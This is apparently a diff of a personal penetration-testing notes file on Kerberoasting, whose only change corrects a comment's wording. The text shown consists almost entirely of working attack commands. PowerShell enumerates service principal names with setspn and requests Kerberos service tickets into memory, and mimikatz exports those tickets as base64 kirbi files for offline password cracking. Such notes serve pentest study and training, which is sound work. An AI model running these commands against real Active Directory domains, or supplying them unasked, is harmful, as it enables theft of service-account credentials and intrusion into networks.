AhmedHosniFahmi/Security_notes/Penetration_Testing/AD/Roasting/Kerberoasting.md

 PS C:\> Add-Type -AssemblyName System.IdentityModel
 PS C:\> setspn.exe -T DOMAIN.LOCAL -Q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() }

-# Extract the tickets that we load into the memory from above commands with mimikatz.exe
+# Extract the tickets that we loaded into the memory from above commands with mimikatz.exe
 mimikatz # base64 /out:true
 mimikatz # kerberos::list /export
 # The output will be the Base64 blop of the kirbi files